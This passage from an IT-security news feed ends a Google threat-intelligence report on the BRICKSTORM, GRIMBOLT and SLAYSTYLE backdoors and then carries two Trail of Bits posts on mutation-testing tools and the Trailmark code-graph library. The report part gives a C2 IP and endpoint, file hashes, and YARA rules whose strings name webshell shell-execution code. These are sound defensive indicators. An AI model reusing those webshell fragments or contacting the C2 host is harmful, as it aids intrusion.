<p role="presentation"><span>Any requests for </span><code>PUT /manager/text/deploy?path=/&lt;MAL_PATH&gt;&amp;update=true</code><span> are potentially malicious. </span><code>MAL_PATH</code><span> will be the path where a potentially malicious WAR file was uploaded</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Uploaded WAR files are typically stored in </span><code>/var/lib/tomcat9</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Compiled artifacts for uploaded WAR files are located in </span><code>/var/cache/tomcat9/Catalina</code></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Tomcat application logs located in </span><code>/var/log/tomcat9/</code></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Catalina - investigate any </span><code>org.apache.catalina.startup.HostConfig.deployWAR</code><span> and </span><code>org.apache.catalina.startup.HostConfig.deployWAR</code><span> events</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Localhost - Contains additional events associated with WAR deployment and any exceptions generated by malicious WAR and embedded files </span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Persistence for <span><span><span><span><span>BRICKSTORM</span></span></span></span></span></span><span> and <span><span><span>GRIMBOLT</span></span></span></span><span> backdoors on Dell RecoverPoint </span><span>for Virtual Machines</span><span> was established by modifying </span><code>/home/kos/kbox/src/installation/distribution/convert_hosts.sh</code><span> to include the path to the backdoor</span></p>
</li>
</ul>
<h3><span>Indicators of Compromise (IOCs)</span></h3>
<p><span>To assist the wider community in hunting and identifying activity outlined in this blog post, we have included <a href="https://www.virustotal.com/gui/collection/6d9bd98653d426b223007bbafb06ba4b83f83df8de01ee1463a8d60fb2be5107/summary" rel="noopener" target="_blank">IOCs in a free GTI Collection</a> for registered users.</span></p>
<h4><span>File Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Family</strong></p>
</td>
<td>
<p><strong>File Name</strong></p>
</td>
<td>
<p><strong>SHA256</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>GRIMBOLT </span></p>
</td>
<td>
<p><span>support</span></p>
</td>
<td>
<p><code>24a11a26a2586f4fba7bfe89df2e21a0809ad85069e442da98c37c4add369a0c</code></p>
</td>
</tr>
<tr>
<td>
<p><span>GRIMBOLT</span></p>
</td>
<td>
<p><span>out_elf_2</span></p>
</td>
<td>
<p><code>dfb37247d12351ef9708cb6631ce2d7017897503657c6b882a711c0da8a9a591</code></p>
</td>
</tr>
<tr>
<td>
<p><span>SLAYSTYLE</span></p>
</td>
<td>
<p><span>default_jsp.java</span></p>
</td>
<td>
<p><code>92fb4ad6dee9362d0596fda7bbcfe1ba353f812ea801d1870e37bfc6376e624a</code></p>
</td>
</tr>
<tr>
<td>
<p><span>BRICKSTORM</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><code>aa688682d44f0c6b0ed7f30b981a609100107f2d414a3a6e5808671b112d1878</code></p>
</td>
</tr>
<tr>
<td>
<p><span>BRICKSTORM</span></p>
</td>
<td>
<p><span>splisten</span></p>
</td>
<td>
<p><code>2388ed7aee0b6b392778e8f9e98871c06499f476c9e7eae6ca0916f827fe65df</code></p>
</td>
</tr>
<tr>
<td>
<p><span>BRICKSTORM</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><code>320a0b5d4900697e125cebb5ff03dee7368f8f087db1c1570b0b62f5a986d759</code></p>
</td>
</tr>
<tr>
<td>
<p><span>BRICKSTORM</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><code>90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035</code></p>
</td>
</tr>
<tr>
<td>
<p><span>BRICKSTORM</span></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><code>45313a6745803a7f57ff35f5397fdf117eaec008a76417e6e2ac8a6280f7d830</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Network Indicators</span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Family</strong></p>
</td>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Type</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>GRIMBOLT</span></p>
</td>
<td>
<p><code>wss://149.248.11.71/rest/apisession</code></p>
</td>
<td>
<p><span>C2 Endpoint</span></p>
</td>
</tr>
<tr>
<td>
<p><span>GRIMBOLT</span></p>
</td>
<td>
<p><code>149.248.11.71</code></p>
</td>
<td>
<p><span>C2 IP</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>YARA Rules</span></h4>
<h5><span>G_APT_BackdoorToehold_GRIMBOLT_1</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorToehold_GRIMBOLT_1
{
  meta:
    author = "Google Threat Intelligence Group (GTIG)"
  strings:
    $s1 = { 40 00 00 00 41 18 00 00 00 4B 21 20 C2 2C 08 23 02 }
    $s2 = { B3 C3 BB 41 0D ?? ?? ?? 00 81 02 0C ?? ?? ?? 00 }
    $s3 = { 39 08 01 49 30 A0 52 30 00 00 00 DB 40 09 00 02 00 80 65 BC 98 }
    $s4 = { 2F 00 72 00 6F 00 75 00 74 00 65 79 23 E8 03 0E 00 00 00 2F 00 70 00 72 00 6F 00 63 00 2F 00 73 00 65 00 6C 00 66 00 2F 00 65 00 78 00 65 }
  condition:
    (uint32(0) == 0x464c457f) //linux
    and all of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>G_Hunting_BackdoorToehold_GRIMBOLT_1</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_BackdoorToehold_GRIMBOLT_1
{
    meta:
        author = "Google Threat Intelligence Group (GTIG)"

    strings:
        $s1 = "[!] Error : Plexor is nul" ascii wide
        $s2 = "port must within 0~6553" ascii wide
        $s3 = "[*] Disposing.." ascii wide
        $s4 = "[!] Connection error. Kill Pty" ascii wide
        $s5 = "[!] Unkown message type" ascii wide
        $s6 = "[!] Bad dat" ascii wide
    condition:
        (  
            (uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or
            uint32(0) == 0x464c457f or
            uint32(0) == 0xfeedface or
            uint32(0) == 0xcefaedfe or
            uint32(0) == 0xfeedfacf or
            uint32(0) == 0xcffaedfe or
            uint32(0) == 0xcafebabe or
            uint32(0) == 0xbebafeca or
            uint32(0) == 0xcafebabf or
            uint32(0) == 0xbfbafeca
        ) and any of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>G_APT_BackdoorWebshell_SLAYSTYLE_4</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorWebshell_SLAYSTYLE_4
{
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "&lt;%@page import=\"java.io" ascii wide
		$str2 = "Base64.getDecoder().decode(c.substring(1)" ascii wide
		$str3 = "{\"/bin/sh\",\"-c\"" ascii wide
		$str4 = "Runtime.getRuntime().exec(" ascii wide
		$str5 = "ByteArrayOutputStream();" ascii wide
		$str6 = ".printStackTrace(" ascii wide
	condition:
		$str1 at 0 and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Google Security Operations (SecOps)</span></h3>
<p><span>Google Security Operations (SecOps) customers have access to these broad category rules and more under the “Mandiant Frontline Threats” and “Mandiant Hunting Rules” rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Web Archive File Write To Tomcat Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Remote Application Deployment via Tomcat Manager</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious File Write To Tomcat Cache Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Kbox Distribution Script Modification</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Multiple DNS-over-HTTPS Services Queried</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication</span></p>
</li>
</ul>
<h3><span>Acknowledgements</span></h3>
<p><span>We appreciate Dell for their collaboration against this threat. This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE. We would like to specifically thank Jakub Jozwiak and Allan Sepillo from GTIG Research and Discovery (RAD).</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing for the agentic era]]></title>
<description><![CDATA[Code coverage is one of the most dangerous quality metrics in software testing. Many developers fail to realize that code coverage lies by omission: it measures execution, not verification. Test suites with high coverage can obfuscate the fact that critical functionality is untested as software d...]]></description>
<link>https://tsecurity.de/de/3501407/it-security-nachrichten/mutation-testing-for-the-agentic-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501407/it-security-nachrichten/mutation-testing-for-the-agentic-era/</guid>
<pubDate>Fri, 08 May 2026 23:19:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Code coverage is one of the most dangerous quality metrics in software testing. Many developers fail to realize that code coverage lies by omission: it measures execution, not verification. Test suites with high coverage can obfuscate the fact that critical functionality is untested as software develops over time. We saw this when mutation testing uncovered a <a href="https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf">high-severity Arkis protocol vulnerability</a>, overlooked by coverage metrics, that would have allowed attackers to drain funds.</p>
<p>Today, we’re announcing <a href="https://github.com/trailofbits/muton">MuTON</a> and <a href="https://github.com/trailofbits/mewt">mewt</a>, two new mutation testing tools optimized for agentic use, along with a <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">configuration optimization skill</a> to help agents set up campaigns efficiently. MuTON provides first-class support for TON blockchain languages (FunC, Tolk, and Tact), while mewt is the language-agnostic core that also supports Solidity, Rust, Go, and more.</p>
<p>The goal of mutation testing is to systematically introduce bugs (mutants) and check if your tests catch them, flagging hot spots where code is insufficiently tested. However, mutation testing tools have historically been slow and language-specific. MuTON and mewt are built to change that. To understand how, it helps to first understand what they’re replacing.</p>
<h2>The regex era</h2>
<p>Mutation testing dates to the 1970s, but for a long time, the technique rarely saw much adoption in the blockchain space as a software quality measurement. Testing frameworks are coupled tightly to target languages, making support for new languages expensive.</p>
<p><a href="https://agroce.github.io/icse18t.pdf">Universalmutator</a> changed this with its regex engine. After a commit on March 10, 2018 added Solidity support, the tool gained immediate traction in the blockchain space. We collaborated with the universalmutator team to advance smart contract testing and highlighted the tool in our <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019 blog post</a>. Despite (or perhaps because of) its elegant approach and compact codebase, universalmutator generated impressive mutant counts, enabling developers to assess test coverage more thoroughly than simpler tools could. Vyper and other language support followed, establishing universalmutator as the leading mutation testing tool for blockchain.</p>
<p>But regex has fundamental limits. Line-based patterns cannot mutate multi-line statements, a critical gap acknowledged by the original paper. More problematic: without mutant prioritization, the tool wastes time on redundant mutations. When commenting a line triggers no test failures, universalmutator still generates and tests every possible variation of that line, dramatically extending campaign runtime. Printing the results to <code>stdout</code> adds further friction for humans and AI agents reviewing campaigns. Later improvements (including a <a href="https://agroce.github.io/fse24.pdf">2024 switch to comby</a> for better syntactic handling) addressed some pain points, but remaining limitations prompted the development of more focused alternatives.</p>
<p>Between 2019 and 2023, several tools emerged to address them, including our own <a href="https://github.com/crytic/slither/blob/master/docs/src/tools/Mutator.md">slither-mutate</a> solution. Each took a different approach to the core problems of language comprehension, scalability, and test quality.</p>
<h2>slither-mutate: Speed through prioritization</h2>
<p>We launched <a href="https://github.com/crytic/slither/blob/master/docs/src/tools/Mutator.md">slither-mutate</a> in August 2022, after our wintern, <a href="https://github.com/vishnuram1999">Vishnuram</a>, brought the concept to life. Because Slither already parsed Solidity’s AST and provided a Python API, the groundwork was laid to generate syntactically valid mutations and implement a cleaner tweak-test-restore cycle (earlier tools polluted repositories with mutated files).</p>
<p>The tool’s key innovation was mutant prioritization: high-severity mutants replace statements with reverts (exposing unexecuted code paths), medium-severity mutants comment out lines (revealing unverified side effects), and low-severity mutants make subtle changes, such as swapping operators. The tool skips lower-severity mutants when higher-severity ones already indicate missing coverage on the same line, dramatically reducing campaign runtime, the biggest obstacle to wider mutation testing adoption. By late 2022, we were deploying slither-mutate across most Solidity audits.</p>
<p>Two limitations remained. First, tight coupling to Solidity meant there was no path to easily support other blockchain languages. Second, dumping results to <code>stdout</code> persisted as a problem, but adding a database to Slither creates unacceptable friction for the broader Slither user base.</p>
<h2>Introducing MuTON and mewt: The tree-sitter era</h2>
<p>MuTON, our newest mutation testing tool, provides first-class support for all three TON blockchain languages: Tolk, Tact, and FunC. We’re grateful to the <a href="https://ton.foundation/">TON Foundation</a> for supporting its development. MuTON is built on mewt, a language-agnostic mutation testing core that also supports Solidity, Rust, and more.</p>
<p>MuTON achieves language comprehension comparable to slither-mutate while supporting multiple languages by using Tree-sitter as its parser. Tree-sitter powers syntax highlighting in modern editors, building a concrete syntax tree that distinguishes language keywords from comments. This allows MuTON to target expressions like if-statements in a well-structured way, handling multi-line statements gracefully. Traditionally, integrating Tree-sitter grammars for new language support takes orders of magnitude longer than writing regex rules, but AI agents paired with <a href="https://github.com/trailofbits/mewt/blob/main/.claude/skills/add-language-support/SKILL.md">bespoke skills</a> invert this calculus, delivering Tree-sitter’s power with regex-like ease of extension.</p>
<p>MuTON stores all mutants and test results in a SQLite database, a quality-of-life improvement that became evident while using slither-mutate but wasn’t feasible to retrofit. Results persist across sessions; campaigns can be paused and resumed without losing progress. If you accidentally close your terminal during a 24-hour campaign, your work survives. Persistent storage also enables flexible filtering and formatting: print only uncaught mutants in specific files, or translate results to SARIF for improved review. This flexibility helps humans and AI agents explore results, triage findings, and hunt for bugs.</p>
<h2>The future of mutation testing</h2>
<p>MuTON addresses many historical pain points, but significant friction remains. Three challenges stand between mutation testing and widespread adoption: configuring campaigns for reasonable runtimes, triaging results to separate signal from noise, and generating tests that encode requirements rather than accidents. AI agents, equipped with specialized skills, promise to transform each of these obstacles into routine tasks.</p>
<h2>Optimizing configuration</h2>
<p>Performance remains the biggest obstacle to mutation testing. If your test suite takes five minutes and you have 1,000 mutants, that’s 83 hours of unavoidable runtime. Mutation testing tools can’t fix slow tests, but smart configuration can dramatically reduce wasted time. MuTON already gives you powerful options to tune campaigns: target critical components instead of everything, use two-phase campaigns that run fast targeted tests first and then retest uncaught mutants with the full suite, configure per-target test commands so mutations in authentication code only trigger authentication tests, or restrict to high and medium severity mutations when time is tight. These tools work today and deliver real speedups.</p>
<p>But the decision tree branches endlessly: should you split by component or severity? Two-phase or targeted tests? What timeout accounts for incremental recompilation? We’ve released a <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">configuration optimization skill</a> that guides AI agents through these choices, measuring your test suite, estimating runtimes, and proposing optimal configurations tailored to your project structure. Try it now—it’s available in our public skills repository and makes the process painless.</p>
<h2>Triaging results</h2>
<p>Not all uncaught mutants matter. Mutations that change <code>x &gt; 0</code> to <code>x != 0</code> are semantic no-ops when <code>x</code> is an unsigned integer. A perfect mutator wouldn’t generate such mutations in the first place, but that would require deeper language-specific understanding than Tree-sitter provides. Manual triage traditionally requires slogging through hundreds of results, checking types, and understanding context to extract actionable insights.</p>
<p>MuTON’s database and flexible filtering already make this dramatically easier. Filter by mutation type or specific files to highlight high-value results. More importantly, these filters make AI-assisted triage token-efficient in ways earlier tools dumping raw output to <code>stdout</code> never could. Even today, asking an agent to review filtered mutation results and summarize true positives delivers 80% of the insights for 1% of the manual work. We’re developing a triage skill that systematically guides agents through result analysis, identifying patterns such as clustered uncaught mutants (a strong bug indicator) versus isolated operator mutations in utility functions (likely false positives or low priority). The skill will help agents flag high-risk areas and explain why specific mutations matter, turning raw results into actionable security insights.</p>
<h2>The promise and peril of mutation-driven test generation</h2>
<p>At first glance, using mutation testing to guide AI agents in writing tests seems like an elegant solution: test mutants, find escapees, generate tests to catch them, repeat until coverage is complete. But this naive approach harbors a subtle danger: an uncritical agent doesn’t know whether it’s encoding correct behavior or propagating bugs into your test suite.</p>
<p>When mutation testing reveals that changing <code>priority &gt;= 2</code> to <code>priority &gt; 2</code> alters behavior, should the agent write a test asserting that <code>priority == 2</code> triggers an action? Maybe. Or maybe that’s a bug, and now you’ve corrupted your tests with the same incorrect logic, giving false confidence while doubling your maintenance burden. The real challenge isn’t generating tests that just catch mutants; it’s generating tests that encode requirements rather than implementation accidents.</p>
<p>We believe the solution lies in building agents that are skeptical, that halt and ask questions when they encounter suspicious or ambiguous patterns, and that demand external validation before crystallizing behavior into tests. It’s a subtle problem that balances AI’s strengths with developers’ limited attention, but we’re working on it. Stay tuned.</p>
<h2>Dive in</h2>
<p>Ready to test your smart contracts? Install <a href="https://github.com/trailofbits/muton?tab=readme-ov-file#installation">MuTON</a> for TON languages, or <a href="https://github.com/trailofbits/mewt?tab=readme-ov-file#installation">mewt</a> for Solidity, Rust, and more. Run a campaign and discover your blind spots. Found a bug in TON language support? File an issue in MuTON. See room for improvement in the core framework or other languages? Join us in the mewt repository. Both projects are open source and welcome contributions.</p>
<p>Watch our <a href="https://github.com/trailofbits/skills">skills</a> repository for new skills that will guide AI agents through campaign setup and result analysis, transforming mutation testing from a manual slog into a routine part of the development process.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trailmark turns code into graphs]]></title>
<description><![CDATA[We’re open-sourcing Trailmark, a library that parses source code into a queryable call graph of functions, classes, call relationships, and semantic metadata, then exposes that graph through a Python API that Claude skills can call directly. Install it now:
uv pip install trailmark
“Defenders thi...]]></description>
<link>https://tsecurity.de/de/3501379/it-security-nachrichten/trailmark-turns-code-into-graphs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501379/it-security-nachrichten/trailmark-turns-code-into-graphs/</guid>
<pubDate>Fri, 08 May 2026 23:18:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We’re open-sourcing <a href="https://github.com/trailofbits/trailmark">Trailmark</a>, a library that parses source code into a queryable call graph of functions, classes, call relationships, and semantic metadata, then exposes that graph through a Python API that Claude skills can call directly. Install it now:</p>
<p><code>uv pip install trailmark</code></p>
<p>“Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” John Lambert’s <a href="https://github.com/JohnLaTwC/Shared/blob/master/Defenders%20think%20in%20lists.%20Attackers%20think%20in%20graphs.%20As%20long%20as%20this%20is%20true%2C%20attackers%20win.md">widely cited observation</a> about network security applies just as well to AI-assisted software analysis.</p>
<p>When Claude reasons about a codebase, it reasons about lists: findings from static analyzers, surviving mutants from mutation testing, and line-by-line coverage reports. But the question that actually matters is a graph question: <em>can untrusted input reach this code, and what breaks if it’s wrong?</em></p>
<p>We built Trailmark to answer that question. It gives Claude a graph to think with instead of a list. We’re also releasing eight Claude Code skills we’ve built on top of it, designed for mutation triage, test vector generation, protocol diagramming, and more.</p>
<h2>When lists fall short</h2>
<p>Mutation testing is a great example of a method that benefits from graph-level reasoning. It’s one of the best ways to measure test quality. It makes small changes to your source code (e.g., swapping a <code>&lt;</code> for <code>&lt;=</code>, replacing <code>+</code> with <code>-</code>) and checks whether your tests catch the difference. Mutants that survive reveal gaps in your test suite that code coverage metrics might miss. The downside is that a mutation testing run on a real codebase can produce hundreds of surviving mutants of varying significance. This is very much a <em>list</em>.</p>
<p>Some surviving mutants are <em>equivalent</em>: the mutation doesn’t change the program’s behavior because of structural or mathematical constraints that the mutation testing tool can’t see. Some are in dead code; some are in error message formatting; some are in the finite field arithmetic that underpins every cryptographic operation in your library. A flat list of surviving mutants doesn’t tell you which is which.</p>
<p>We wanted to know whether Claude could use graph-level reasoning about a codebase to automatically triage surviving mutants by security relevance: which are reachable from untrusted input, which affect high-blast-radius functions, and which represent genuine gaps in security-critical code?</p>
<h2>How Trailmark works</h2>
<p>Trailmark uses <a href="https://tree-sitter.github.io/">tree-sitter</a> for language-agnostic AST parsing and <a href="https://www.rustworkx.org/">rustworkx</a> for high-performance graph traversal. It operates in three phases:</p>
<ol>
<li><strong>Parse</strong>: Walk a directory, extract functions, classes, call edges, type annotations, cyclomatic complexity, and branch counts from source code.</li>
<li><strong>Index</strong>: Load the resulting graph into a rustworkx PyDiGraph with bidirectional ID/index mappings for fast traversal.</li>
<li><strong>Query</strong>: Answer questions: callers, callees, all paths between two nodes, attack surface enumeration, and complexity hotspots.</li>
</ol>
<p>It currently supports 17 languages, including C, Rust, Go, Python, PHP, JavaScript, Solidity, Circom, and Miden Assembly.</p>
<p>The graph is the substrate. The skills are where the analysis happens.</p>
<h2>The skills</h2>
<p>The Trailmark plugin ships eight Claude Code skills that use the graph API as their backbone:</p>
<table>
 <thead>
 <tr>
 <th>Skill</th>
 <th>What it does</th>
 </tr>
 </thead>
 <tbody>
 <tr>
 <td><code>trailmark</code></td>
 <td>Build and query a code graph with pre-analysis passes: blast radius, taint propagation, privilege boundaries, and entrypoint enumeration</td>
 </tr>
 <tr>
 <td><code>diagram</code></td>
 <td>Generate Mermaid diagrams from code graphs: call graphs, class hierarchies, complexity heatmaps, data flow</td>
 </tr>
 <tr>
 <td><code>crypto-protocol-diagram</code></td>
 <td>Extract protocol message flow from source code or specs (RFCs, ProVerif, Tamarin) into annotated sequence diagrams</td>
 </tr>
 <tr>
 <td><code>genotoxic</code></td>
 <td>Triage mutation testing results using graph analysis: classify surviving mutants as equivalent, missing test coverage, or fuzzing targets</td>
 </tr>
 <tr>
 <td><code>vector-forge</code></td>
 <td>Mutation-driven test vector generation: find coverage gaps via mutation testing, then generate Wycheproof-style vectors that close them</td>
 </tr>
 <tr>
 <td><code>graph-evolution</code></td>
 <td>Compare code graphs at two snapshots to surface security-relevant structural changes that text diffs miss</td>
 </tr>
 <tr>
 <td><code>mermaid-to-proverif</code></td>
 <td>Convert Mermaid sequence diagrams into ProVerif formal verification models</td>
 </tr>
 <tr>
 <td><code>audit-augmentation</code></td>
 <td>Project SARIF and weAudit findings onto code graph nodes as annotations, enabling cross-referencing of static analysis results with blast radius and taint data</td>
 </tr>
 </tbody>
</table>
<p>Each skill calls the Trailmark Python API directly. When <code>genotoxic</code> triages a surviving mutant, it queries <code>engine.paths_between</code> to check reachability from untrusted input. When <code>diagram</code> generates a complexity heatmap, it calls <code>engine.complexity_hotspots</code>. The graph is what makes those questions answerable in seconds rather than hours of manual tracing.</p>
<p>Trailmark also ingests SARIF output from static analyzers and <a href="https://blog.trailofbits.com/2024/03/19/read-code-like-a-pro-with-our-weaudit-vscode-extension/">weAudit</a> annotations, mapping external findings onto graph nodes by file and line range. This lets Claude layer static analysis results, audit notes, and mutation testing data onto a single unified graph, then query across all of them.</p>
<h2>What Claude found</h2>
<p>We’ve been using these skills internally on several cryptographic libraries, combining graph analysis with language-appropriate mutation testing frameworks. Here’s what the graph let Claude see that flat lists couldn’t.</p>
<h3>Equivalent mutants are the majority in well-tested crypto</h3>
<p>When we ran mutation testing against an Ed448 implementation in Go, 45 mutants survived out of 583 covered. A flat list of 45 surviving mutants looks like a serious test gap. But when Claude used the Trailmark call graph (332 nodes, 3,259 call edges) to triage via <code>genotoxic</code>, 33 of those 45 (73%) were equivalent mutants. The mutations were unobservable because the code’s mathematical structure constrained values more tightly than the explicit bounds checks that were mutated.</p>
<p>For example, nine surviving mutants modified boundary conditions in NAF (non-adjacent form) digit range checks. These look like real bugs in isolation. But the NAF digits are structurally bounded by the <code>nonAdjacentForm</code> algorithm itself: the values that would trigger the altered boundary can never appear. The graph confirmed these functions were called from specific contexts that made the mutations undetectable.</p>
<p>The 12 genuine gaps were concrete and actionable: a cross-package coverage gap where Go’s coverage profiling attributed execution to the calling package instead of the defining package, a 255-byte context string boundary condition that was never tested, and overflow carry paths in wide-integer parsing that required near-maximum input values that no existing test vector produced.</p>
<h3>Architectural bottlenecks are invisible without a graph</h3>
<p>When Claude built a Trailmark graph of <code>libhydrogen</code>, a compact C cryptographic library, the graph immediately highlighted something that wasn’t obvious from linearly reading the source files: the entire library funnels through a single permutation primitive, <code>gimli_core_u8</code>, which receives 37 direct calls. Every cryptographic operation (hashing, encryption, key exchange, signatures, and password hashing) depends on this one function.</p>
<p>This isn’t a bug. It’s a deliberate design choice common in lightweight crypto libraries. But it means the blast radius of a flaw in Gimli is total. The graph quantified this: a mutation in <code>gimli_core_u8</code> affects 100% of the library’s security-critical functionality. Gimli was also eliminated from the NIST Lightweight Cryptography competition. Together, these facts represent the kind of architectural risk that’s invisible in a line-by-line code review. The graph makes it obvious.</p>
<h3>Mutation testing finds what KATs can’t cover</h3>
<p>For standardized algorithms like Ed25519 or ML-KEM, known-answer tests (KATs) and projects like <a href="https://github.com/google/wycheproof">Wycheproof</a> provide test vectors that exercise edge cases. But for novel constructions (libhydrogen’s combination of Gimli and Curve25519, for instance), independent KATs don’t exist. No one has published “if you give Gimli-based AEAD this input, you should get this output” vectors, because the construction is unique to this library.</p>
<p>This is where mutation testing fills the gap. It doesn’t need reference implementations or published test vectors. It tests whether <em>your</em> tests actually constrain <em>your</em> code’s behavior. The surviving mutants tell you exactly which aspects of the implementation aren’t pinned down by your test suite, regardless of whether anyone else has ever tested that specific construction.</p>
<p>In the RustCrypto/KEMs crates (ML-KEM, X-Wing), <code>vector-forge</code> found that seven surviving mutants targeted NTT multiplication (mutations like replacing <code>*</code> with <code>+</code> in polynomial dot products). These survived because the test suite only exercised NTT through full KEM round-trips. The algebraic properties of NTT were never tested directly. Existing Wycheproof vectors and NIST KATs caught most higher-level issues, but the internal algebraic invariants had no direct coverage.</p>
<h3>Three patterns that showed up everywhere</h3>
<p>Across multiple codebases analyzed with Trailmark, the same patterns emerged:</p>
<ul>
<li>
<p><strong>Blast radius concentrates in arithmetic modules.</strong> In libsodium (1,597 nodes, 9,574 call edges), the ed25519_ref10 module had the highest blast radius, underpinning Ed25519 signatures, Curve25519 key exchange, Ristretto255, and X-Wing KEM. In ML-KEM, the algebra module had a blast radius of 28; every polynomial and matrix operation depended on its Elem arithmetic. Graph analysis consistently identified these modules as the highest-priority targets for thorough testing.</p>
</li>
<li>
<p><strong>Codec parsers are high-value fuzzing targets that rarely get prioritized.</strong> Multiple analyses flagged hex/Base64 decoders and IP address parsers as high-complexity functions with external input exposure. libsodium’s <code>parse_ipv6</code> had a cyclomatic complexity of 18; libhydrogen’s <code>hydro_hex2bin</code> was the most complex function in the entire library, with a cyclomatic complexity of 11. These functions are natural targets for fuzzing, and the graph confirms they’re reachable from untrusted input.</p>
</li>
<li>
<p><strong>Property-based testing is sparse.</strong> Across the Rust cryptographic crates we examined, property-based testing was either absent or incomplete. The KEMs crates had zero property-based tests. Barrett reduction in ML-KEM was tested with only five points, even though exhaustive testing over all 11 million values of q = 3329 is computationally feasible. The graph’s blast radius analysis shows where property-based tests would have the greatest impact.</p>
</li>
</ul>
<h2>Connecting the graph to everything else</h2>
<p>The graph is most useful when it serves as the connective tissue between other analysis tools. When the constant-time analysis skill flags a function, Trailmark tells Claude its blast radius. When mutation testing produces survivors, Trailmark tells Claude which ones are reachable from untrusted input. When an auditor annotates a finding in weAudit, <code>audit-augmentation</code> shows what else in the graph is affected.</p>
<p>We use this internally to write targeted fuzzing harnesses. The graph identifies high-complexity functions reachable from external input; mutation testing identifies which of those functions have test gaps; the combination tells Claude exactly where a fuzzing harness will have the highest marginal value.</p>
<h2>Start querying your codebase</h2>
<p>Trailmark is open source under <a href="https://github.com/trailofbits/trailmark">Apache-2.0</a>. The library is on PyPI; the skills plugin is in the same repository.</p>
<p><strong>Install the library</strong> (required by the skills):</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">uv pip install trailmark</span></span></code></pre>
</figure>
<p><strong>Add the skills to Claude Code:</strong></p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">/plugin marketplace add trailofbits/skills</span></span></code></pre>
</figure>
<p>Then select the Trailmark plugin from the menu.</p>
<p>You can also explore the graph directly from the CLI:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1"># Full JSON graph</span>
</span></span><span class="line"><span class="cl">trailmark analyze path/to/project
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Analyze a specific language</span>
</span></span><span class="line"><span class="cl">trailmark analyze --language rust path/to/project
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Complexity hotspots</span>
